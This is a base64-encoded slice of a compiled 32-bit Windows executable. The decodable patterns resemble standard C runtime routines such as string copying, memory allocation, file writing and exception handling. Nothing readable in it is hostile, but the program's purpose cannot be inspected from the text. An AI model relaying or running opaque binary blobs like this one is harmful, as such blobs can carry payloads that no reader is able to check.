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HsBEHQHUOgzt///WYtGHDsFhHsBEHQHUOght///WYtGIDsFiHsBEHQHUOgPt///WYtGJDsFjHsBEHQHUOj9tv//WYtGODsFoHsBEHQHUOjrtv//WYtGPDsFpHsBEHQHUOjZtv//WYtGQDsFqHsBEHQHUOjHtv//WYtGRDsFrHsBEHQHUOi1tv//WYtGSDsFsHsBEHQHUOijtv//WYtGTDsFtHsBEHQHUOiRtv//WV5dw1WL7FaLdQiF9nRZiwY7BWh7ARB0B1Docrb//1mLRgQ7BWx7ARB0B1DoYLb//1mLRgg7BXB7ARB0B1DoTrb//1mLRjA7BZh7ARB0B1DoPLb//1mLRjQ7BZx7ARB0B1DoKrb//1leXcNVi+xWi3UIhfYPhG4DAAD/dgToD7b///92COgHtv///3YM6P+1////dhDo97X///92FOjvtf///3YY6Oe1////Nujgtf///3Yg6Ni1////diTo0LX///92KOjItf///3Ys6MC1////djDouLX///92NOiwtf///3Yc6Ki1////djjooLX///92POiYtf//g8RA/3ZA6I21////dkTohbX///92SOh9tf///3ZM6HW1////dlDobbX///92VOhltf///3ZY6F21////dlzoVbX///92YOhNtf///3Zk6EW1////dmjoPbX///92bOg1tf///3Zw6C21////dnToJbX///92eOgdtf///3Z86BW1//+DxED/toAAAADoB7X///+2hAAAAOj8tP///7aIAAAA6PG0////towAAADo5rT///+2kAAAAOjbtP///7aUAAAA6NC0////tpgAAADoxbT///+2nAAAAOi6tP///7agAAAA6K+0////tqQAAADopLT///+2qAAAAOiZtP///7a4AAAA6I60////trwAAADog7T///+2wAAAAOh4tP///7bEAAAA6G20////tsgAAADoYrT//4PEQP+2zAAAAOhUtP///7a0AAAA6Em0////ttQAAADoPrT///+22AAAAOgztP///7bcAAAA6Ci0////tuAAAADoHbT///+25AAAAOgStP///7boAAAA6Ae0////ttAAAADo/LP///+27AAAAOjxs////7bwAAAA6Oaz////tvQAAADo27P///+2+AAAAOjQs////7b8AAAA6MWz////tgABAADourP///+2BAEAAOivs///g8RA/7YIAQAA6KGz////tgwBAADolrP///+2EAEAAOiLs////7YUAQAA6ICz////thgBAADodbP///+2HAEAAOhqs////7YgAQAA6F+z////tiQBAADoVLP///+2KAEAAOhJs////7YsAQAA6D6z////tjABAADoM7P///+2NAEAAOgos////7Y4AQAA6B2z////tjwBAADoErP///+2QAEAAOgHs////7ZEAQAA6Pyy//+DxED/tkgBAADo7rL///+2TAEAAOjjsv///7ZQAQAA6Niy////tlQBAADozbL///+2WAEAAOjCsv///7ZcAQAA6Ley////tmABAADorLL//4PEHF5dw1WL7FFRocBwARAzxYlF/FNWi3UYV4X2fiGLRRSLzkmAOAB0CECFyXX1g8n/i8YrwUg7xo1wAXwCi/CLTSQz/4XJdQ2LRQiLAItABIlFJIvIM8A5RShqAA+VwGoAVv91FI0ExQEAAABQUf8VEPAAEIvIiU34hcl1BzPA6VgBAAB+S2rgM9JY9/GD+AJyP40MTQgAAACB+QAEAAB3FYvB6LcVAACL3IXbdB7HA8zMAADrE1HoMLP//4vYWYXbdAnHA93dAACDwwiLTfjrAjPbhdt0plFTVv91FGoB/3Uk/xUQ8AAQhcAPhOMAAACLdfhqAGoAVlP/dRD/dQzoZPn//4v4g8QYhf8PhMIAAAC5AAQAAIVNEHQsi00ghckPhK0AAAA7+Q+PpQAAAFH/dRxWU/91EP91DOgp+f//g8QY6YwAAACF/35CauAz0lj394P4AnI2jQR9CAAAADvBdxPo+BQAAIv0hfZ0ZscGzMwAAOsTUOhxsv//i/BZhfZ0UccG3d0AAIPGCOsCM/aF9nRAV1b/dfhT/3UQ/3UM6MT4//+DxBiFwHQhM8BQUDlFIHUEUFDrBv91IP91HFdWUP91JP8VAPAAEIv4VugA+P//WVPo+ff//1mLx41l7F9eW4tN/DPN6BWH///Jw1WL7IPsEP91CI1N8Oixj////3UojUXw/3Uk/3Ug/3Uc/3UY/3UU/3UQ/3UMUOjl/f//g8QkgH38AHQHi034g2Fw/cnDVYvsUaHAcAEQM8WJRfyLTRxTVlcz/4XJdQ2LRQiLAItABIlFHIvIM8A5RSBXV/91FA+VwP91EI0ExQEAAABQUf8VEPAAEIvYhdt1BzPA6YcAAAB+QYH78P//f3c5jQRdCAAAAD0ABAAAdxPovRMAAIv0hfZ01scGzMwAAOsTUOg2sf//i/BZhfZ0wccG3d0AAIPGCOsCi/eF9nSwjQQbUFdW6IYAAACDxAxTVv91FP91EGoB/3Uc/xUQ8AAQhcB0EP91GFBW/3UM/xV88AAQi/hW6Mn2//9Zi8eNZfBfXluLTfwzzejlhf//ycNVi+yD7BD/dQiNTfDogY7///91II1F8P91HP91GP91FP91EP91DFDo6P7//4PEHIB9/AB0B4tN+INhcP3Jw8zMzItUJAyLTCQEhdJ0fw+2RCQID7oluIUBEAFzDYtMJAxXi3wkCPOq612LVCQMgfqAAAAAfA4PuiXIcAEQAQ+C6hIAAFeL+YP6BHIx99mD4QN0DCvRiAeDxwGD6QF19ovIweAIA8GLyMHgEAPBi8qD4gPB6QJ0BvOrhdJ0CogHg8cBg+oBdfaLRCQIX8OLRCQEw1WL7DPSi8I5RQx2EYtNCGY5EXQJQIPBAjtFDHLyXcNVi+yD7BD/dQyNTfDokY3//4tF8A+2TQiLgJAAAAAPtwRIJQCAAACAffwAdAeLTfiDYXD9ycNVi+xqAP91COi9////WVldw6FokAEQVmoUXoXAdQe4AAIAAOsGO8Z9B4vGo2iQARBqBFDoyKj//1lZo2SQARCFwHUeagRWiTVokAEQ6K+o//9ZWaNkkAEQhcB1BWoaWF7DM9K5yHsBEIkMAoPBII1SBIH5SH4BEH0HoWSQARDr6DPAXsPomxAAAIA9wIUBEAB0Beh4EgAA/zVkkAEQ6MWt//+DJWSQARAAWcO4yHsBEMNVi+xWi3UIuch7ARA78XIigf4ofgEQdxqLxivBwfgFg8AQUOh16f//gU4MAIAAAFnrCo1GIFD/FdTwABBeXcNVi+yLRQiD+BR9FoPAEFDoSun//4tFDFmBSAwAgAAAXcOLRQyDwCBQ/xXU8AAQXcNVi+yLRQi5yHsBEDvBch89KH4BEHcYgWAM/3///yvBwfgFg8AQUOhn6v//WV3Dg8AgUP8V2PAAEF3DVYvsi00Ii0UMg/kUfROBYAz/f///jUEQUOg66v//WV3Dg8AgUP8V2PAAEF3DVYvsi0UIhcB1Fegp0f//xwAWAAAA6PDC//+DyP9dw4tAEF3DVYvsi00Ig/n+dQ3oBNH//8cACQAAAOs4hcl4JDsNgKABEHMci8HB+AWD4R+LBIVojAEQweEGD75ECASD4EBdw+jP0P//xwAJAAAA6JbC//8zwF3DahBo2FUBEOjgp///i3UIg/7+dRjoc9D//4MgAOif0P//xwAJAAAA6a0AAACF9g+IjQAAADs1gKABEA+DgQAAAIvewfsFi/6D5x/B5waLBJ1ojAEQD75EOASD4AF0Y1boSREAAFmDZfwAiwSdaIwBEPZEOAQBdBP/dRD/dQxW6F8AAACDxAyL+OsW6DHQ///HAAkAAADo8s///4MgAIPP/4l95MdF/P7////oCgAAAIvH6ymLdQiLfeRW6GcSAABZw+jGz///gyAA6PLP///HAAkAAADoucH//4PI/+hQp///w1WL7LjwGgAA6K0TAAChwHABEDPFiUX8i0UIi00MM9JXi/qJhUDl//+JjUTl//+JvTzl//+JlSzl//85VRB1BzPA6dcHAACFyXUf6FvP//8hOOiIz///xwAWAAAA6E/B//+DyP/ptAcAAFNWi8jB+QWL8IPmH8HmBomNMOX//4sMjWiMARCJtRTl//+KXA4kAtvQ+4D7AnQFgPsBdSuLRRD30KgBdRzo/87//yE46CzP///HABYAAADo88D//+lMBwAAi4VA5f//9kQOBCB0DWoCUlJQ6E0IAACDxBD/tUDl///o4/3//1mFwA+EGAMAAIuFMOX//4sEhWiMARD2RAYEgA+EAAMAAOi8uP//i0BsM8k5iKgAAACNhRzl//9Qi4Uw5f//D5TBiwSFaIwBEP80BomNQOX///8V9PAAEIXAD4TCAgAAOb1A5f//dAiE2w+EsgIAAP8V8PAAEIuVROX//yG9JOX//4vKiYUQ5f//iY005f//OX0QD4Z+AgAAM8CJhTjl///HhRjl//8KAAAAhNsPhY8BAACKCTPAgPkKD5TAiYVA5f//i4Uw5f//ixSFaIwBEIN8FjgAdBeKRBY0iEX0agKNRfSITfWDZBY4AFDrWg++wVDoQvv//1mFwHREi4VE5f//i5U05f//K8IDRRCD+AEPhtMBAABqAlKNhTzl//9Q6FIRAACDxAyD+P8PhNsBAACLhTTl//9A/4U45f//6yZqAf+1NOX//42FPOX//1DoIxEAAIPEDIP4/w+ErAEAAIuFNOX//zPJUVFA/4U45f//agWJhTTl//+NRfRQagGNhTzl//9QUf+1EOX///8VAPAAEImFHOX//4XAD4RrAQAAagCNjSTl//9RUI1F9FCLhTDl//+LBIVojAEQ/zQG/xVY8AAQhcAPhOsEAACLvTjl//+LhRzl//8DvSzl//85hSTl//8PjCEBAACDvUDl//8AD4TaAAAAagCNhSTl//9QagGNRfRQi4Uw5f//xkX0DYsEhWiMARD/NAb/FVjwABCFwA+EjwQAAIO9JOX//wEPjNYAAAD/hSzl//9H6ZAAAACA+wF0BYD7AnUzD7cBM9JmO4UY5f//iYU85f//i4U45f//D5TCg8ECg8ACiY005f//iYU45f//iZVA5f//gPsBdAWA+wJ1Vf+1POX//+j7DwAAWWY7hTzl//8PhRYEAACDxwKDvUDl//8AdCRqDVhQiYU85f//6NIPAABZZjuFPOX//w+F7QMAAEf/hSzl//+LhTjl//+LjTTl//87RRAPgsT9///rI4udMOX//4oCiwydaIwBEEeIRA40iwSdaIwBEMdEBjgBAAAAi7VA5f//6akDAACLtUDl///pqAMAAIuFMOX//4sEhWiMARD2RAYEgA+EVQMAAIuVROX//zP2ibU45f//hNsPheEAAACLwomFPOX//zl1EA+GkQMAADPJK8KLlTzl//+NnUjl//+JjUDl//87RRBzRIoKQkCIjSPl//+A+QqLjUDl//+JlTzl//91C/+FLOX//8YDDUNBipUj5f//iBOLlTzl//9DQYmNQOX//4H5/xMAAHK3i40U5f//jYVI5f//K9hqAI2FKOX//1BTjYVI5f//UIuFMOX//4sEhWiMARD/NAH/FVjwABCFwA+EuwIAAAO9KOX//4uVROX//zmdKOX//w+MsQIAAIuFPOX//yvCO0UQi4U85f//D4I1////6ZUCAACLyoD7Ag+F/gAAAImNQOX//zl1EA+GpwIAAMeFGOX//woAAACDpRzl//8Ai70s5f//i8ErwouVHOX//42dSOX//ztFEHM+D7cxg8ECg8ACiY1A5f//Zju1GOX//3UVag1ZZokLi41A5f//g8cCg8MCg8ICZokzg8ICg8MCgfr+EwAAcr2LjRTl//+NhUjl//8r2GoAjYUo5f//UFONhUjl//9Qi4Uw5f//ib0s5f//iwSFaIwBEP80Af8VWPAAEIu1OOX//4u9POX//4XAD4S0AQAAA70o5f//i5VE5f//ib085f//OZ0o5f//D4ykAQAAi41A5f//i8ErwjtFEA+CIP///+mMAQAAi10QiY0k5f//hdsPhKcBAADHhRjl//8KAAAAg6Uc5f//AIu1JOX//yvKi5Uc5f//jYVI+f//O8tzOw+3PoPGAoPBAom1JOX//2Y7vRjl//91EmoNXmaJMIu1JOX//4PAAoPCAmaJOIPCAoPAAoH6qAYAAHLBM/ZWVmhVDQAAjY3w6///UY2NSPn//yvBmSvC0fhQi8FQVmjp/QAA/xUA8AAQi7U45f//i7085f//iYU05f//hcAPhMIAAAAzyYmNQOX//2oAK8GNlSjl//9SUI2F8Ov//wPBi40U5f//UIuFMOX//4sEhWiMARD/NAH/FVjwABCFwHQei41A5f//A40o5f//i4U05f//iY1A5f//O8F/r+sa/xUI8AAQi41A5f//i/CLhTTl//+JtTjl//87wX9Ri40k5f//i5VE5f//i/kr+om9POX//zv7D4LI/v//6zdqAI2NKOX//1H/dRD/tUTl////NAb/FVjwABCFwHQKi70o5f//M/brCP8VCPAAEIvwi5VE5f//hf91Y4X2dCRqBVs783UU6B7I///HAAkAAADo38f//4kY6z9W6OjH//9Z6zaLhTDl//+LjRTl//+LBIVojAEQ9kQBBEB0CYA6GnUEM8DrIOjex///xwAcAAAA6J/H//+DIACDyP/rCCu9LOX//4vHXluLTfwzzV/otHn//8nDahho+FUBEOjUnv//g87/iXXYiXXci30Ig//+dRjoXsf//4MgAOiKx///xwAJAAAA6b0AAACF/w+InQAAADs9gKABEA+DkQAAAIvHwfgFiUXki9+D4x/B4waLBIVojAEQD75EGASD4AF0cFfoMQgAAFmDZfwAi0XkiwSFaIwBEPZEGAQBdBj/dRT/dRD/dQxX6GcAAACDxBCL8Iva6xXoEcf//8cACQAAAOjSxv//gyAAi96JddiJXdzHRfz+////6A0AAACL0+sri30Ii13ci3XYV+hCCQAAWcPoocb//4MgAOjNxv//xwAJAAAA6JS4//+L1ovG6Cqe///DVYvsUVFWi3UIV1bopwgAAIPP/1k7x3UR6JvG///HAAkAAACLx4vX60T/dRSNTfhR/3UQ/3UMUP8V+PAAEIXAdQ//FQjwABBQ6ErG//9Z69OLxsH4BYPmH4sEhWiMARDB5gaAZDAE/YtF+ItV/F9eycNVi+z/BUSQARBWvgAQAABW6L2c//9Zi00IiUEIhcB0CYNJDAiJcRjrEYNJDASNQRSJQQjHQRgCAAAAi0EIg2EEAIkBXl3Diw3AcAEQg8kBM8A5DUiQARAPlMDDVYvsg+wQU4tdDFeLfRCF23UShf90DotFCIXAdAODIAAzwOt/i0UIhcB0A4MI/1aB/////392Eeiwxf//ahZeiTDoeLf//+tY/3UYjU3w6EaA//+LRfAz9jmwqAAAAHVgZotFFLn/AAAAZjvBdjmF23QPhf90C1dWU+jK8f//g8QM6GbF///HACoAAADoW8X//4swgH38AHQHi034g2Fw/YvGXl9bycOF23QGhf90X4gDi0UIhcB028cAAQAAAOvTjU0MUVZXU2oBjU0UUVaJdQz/cAT/FQDwABCLyIXJdBA5dQx1nItFCIXAdKeJCOuj/xUI8AAQg/h6dYaF23QPhf90C1dWU+g98f//g8QM6NnE//9qIl6JMOihtv//6XH///9Vi+xqAP91FP91EP91DP91COjI/v//g8QUXcPMzMzMzMzMzMzMzFaLRCQUC8B1KItMJBCLRCQMM9L38YvYi0QkCPfxi/CLw/dkJBCLyIvG92QkEAPR60eLyItcJBCLVCQMi0QkCNHp0dvR6tHYC8l19Pfzi/D3ZCQUi8iLRCQQ9+YD0XIOO1QkDHcIcg87RCQIdglOK0QkEBtUJBQz2ytEJAgbVCQM99r32IPaAIvKi9OL2YvIi8ZewhAAVYvsg+wQVv91CI1N8Oiqfv//D7Z1DItF9IpNFIRMMBl1HzPSOVUQdBKLRfCLgJAAAAAPtwRwI0UQ6wKLwoXAdAMz0kKAffwAXnQHi034g2Fw/YvCycNVi+xqBGoA/3UIagDomf///4PEEF3DzMzMzMzMzMzMzMzMzMzMVYvsU1ZXVWoAagBo6NoAEP91COhWCwAAXV9eW4vlXcOLTCQE90EEBgAAALgBAAAAdDKLRCQUi0j8M8joUnX//1WLaBCLUChSi1AkUugUAAAAg8QIXYtEJAiLVCQQiQK4AwAAAMNTVleLRCQQVVBq/mjw2gAQZP81AAAAAKHAcAEQM8RQjUQkBGSjAAAAAItEJCiLWAiLcAyD/v90OoN8JCz/dAY7dCQsdi2NNHaLDLOJTCQMiUgMg3yzBAB1F2gBAQAAi0SzCOhJAAAAi0SzCOhfAAAA67eLTCQEZIkNAAAAAIPEGF9eW8MzwGSLDQAAAACBeQTw2gAQdRCLUQyLUgw5UQh1BbgBAAAAw1NRu1B+ARDrC1NRu1B+ARCLTCQMiUsIiUMEiWsMVVFQWFldWVvCBAD/0MNVi+yLRQj32BvAg+ABXcNqAujQlf//WcNVi+xWi3UIhfZ1CVboogAAAFnrL1boLAAAAFmFwHQFg8j/6x/3RgwAQAAAdBRW6Nrw//9Q6BMGAABZ99hZG8DrAjPAXl3DVYvsU1aLdQgz24tGDCQDPAJ1QvdGDAgBAAB0OVeLPit+CIX/fi5X/3YIVuiX8P//WVDoCPH//4PEDDvHdQ+LRgyEwHkPg+D9iUYM6weDTgwgg8v/X4tOCINmBACJDl6Lw1tdw2oB6AIAAABZw2oUaBhWARDospj//zP/iX3kIX3cagHoBtn//1khffwz9otdCIl14Ds1aJABEA+NhgAAAKFkkAEQiwSwhcB0XfZADIN0V1BW6Hfv//9ZWcdF/AEAAAChZJABEIsEsPZADIN0MIP7AXUSUOjf/v//WYP4/3QfR4l95OsZhdt1FfZADAJ0D1Dow/7//1mD+P91AwlF3INl/ADoDAAAAEbrhYtdCIt95It14KFkkAEQ/zSwVuh37///WVnDx0X8/v///+gWAAAAg/sBi8d0A4tF3OgvmP//w4tdCIt95GoB6KPZ//9Zw8zMzMzMzMzMzMxRjUwkCCvIg+EPA8EbyQvBWelqBAAAUY1MJAgryIPhBwPBG8kLwVnpVAQAAIXAdQZmD+/A6xFmD27AZg9gwGYPYcBmD3DAAFNRi9mD4w+F23V4i9qD4n/B6wd0MGYPfwFmD39BEGYPf0EgZg9/QTBmD39BQGYPf0FQZg9/QWBmD39BcI2JgAAAAEt10IXSdDeL2sHrBHQP6wONSQBmD38BjUkQS3X2g+IPdByL2sHqAnQKZg9+AY1JBEp19oPjA3QGiAFBS3X6WFvD99uDwxAr01KL04PiA3QGiAFBSnX6wesCdApmD34BjUkES3X2Wule////ahBoQFYBEOjQlv//M/+JfeRqAegn1///WSF9/GoDXol14Ds1aJABEH1ToWSQARCLBLCFwHRE9kAMg3QQUOjHBAAAWYP4/3QER4l95IP+FHwpoWSQARCLBLCDwCBQ/xW48AAQoWSQARD/NLDo6Jr//1mhZJABEIMksABG66LHRfz+////6AsAAACLx+iRlv//w4t95GoB6AjY//9Zw2oIaGBWARDoM5b//4t9CIvHwfgFi/eD5h/B5gYDNIVojAEQg34IAHUwagroctb//1mDZfwAg34IAHUSaKAPAACNRgxQ/xWM8AAQ/0YIx0X8/v///+gqAAAAi8fB+AWD5x/B5waLBIVojAEQg8AMA8dQ/xXU8AAQM8BA6AWW///Di30IagrofNf//1nDVYvsi0UIVleFwHhgOwWAoAEQc1iL+MH/BYvwiwy9aIwBEIPmH8HmBvZEDgQBdD2DPA7/dDeDPfiFARABdR8zySvBdBBIdAhIdRNRavTrCFFq9esDUWr2/xX88AAQiwS9aIwBEIMMBv8zwOsW6Ba+///HAAkAAADo173//4MgAIPI/19eXcNVi+yLTQiD+f51Fei9vf//gyAA6Om9///HAAkAAADrQoXJeCY7DYCgARBzHovBwfgFg+EfiwSFaIwBEMHhBvZECAQBdAWLBAhdw+h+vf//gyAA6Kq9///HAAkAAADoca///4PI/13DVYvsi00Ii8GD4R/B+AXB4QaLBIVojAEQg8EMA8FQ/xXY8AAQXcNVi+yD7BBTVot1DIX2dBiLXRCF23QRgD4AdRKLRQiFwHQFM8lmiQgzwF5bycNX/3UUjU3w6Oh3//+LRfCDuKgAAAAAdRWLTQiFyXQGD7YGZokBM/9H6YQAAACNRfBQD7YGUOgY6v//WVmFwHRAi33wg390AX4nO190fCUzwDlFCA+VwFD/dQj/d3RWagn/dwT/FRDwABCLffCFwHULO190ci6AfgEAdCiLf3TrMTPAOUUID5XAM/9HUP91CItF8FdWagn/cAT/FRDwABCFwHUO6J+8//+Dz//HACoAAACAffwAdAeLTfiDYXD9i8df6Tb///9Vi+xqAP91EP91DP91COj6/v//g8QQXcNVi+xRoWB+ARCD+P51Cug9AgAAoWB+ARCD+P91B7j//wAAycNqAI1N/FFqAY1NCFFQ/xUA8QAQhcB04maLRQjJw8zMzMxRjUwkBCvIG8D30CPIi8QlAPD//zvIcgqLwVmUiwCJBCTDLQAQAACFAOvpahRogFYBEOgZk///i30Ig//+dRDo4Lv//8cACQAAAOm5AAAAhf8PiKEAAAA7PYCgARAPg5UAAACLx8H4BYlF4Ivfg+MfweMGiwSFaIwBEA++RAMEg+ABdHRX6If8//9ZM/aJdfyLReCLBIVojAEQ9kQDBAF0KFfofP3//1lQ/xUE8QAQhcB1CP8VCPAAEIvwiXXkhfZ0GOgpu///iTDoVrv//8cACQAAAIPO/4l15MdF/P7////oCgAAAIvG6yGLfQiLdeRX6JT9//9Zw+gnu///xwAJAAAA6O6s//+DyP/ohZL//8NVi+xWi3UIV4PP/4X2dRTo/7r//8cAFgAAAOjGrP//C8frRfZGDIN0OVbo5fj//1aL+OiAAgAAVuie6f//UOgQAQAAg8QQhcB5BYPP/+sTg34cAHQN/3Yc6F6W//+DZhwAWYNmDACLx19eXcNqDGigVgEQ6MeR//+Dz/+JfeQzwIt1CIX2D5XAhcB1GOiCuv//xwAWAAAA6Ems//+Lx+jhkf//w/ZGDEB0BoNmDADr7FboT+j//1mDZfwAVug/////WYv4iX3kx0X8/v///+gIAAAA68eLdQiLfeRW6JPo//9Zw6FgfgEQg/j/dAyD+P50B1D/FRTwABDDM8BQUGoDUGoDaAAAAEBomEIBEP8VCPEAEKNgfgEQw8zMzMzMzItEJAiLTCQQC8iLTCQMdQmLRCQE9+HCEA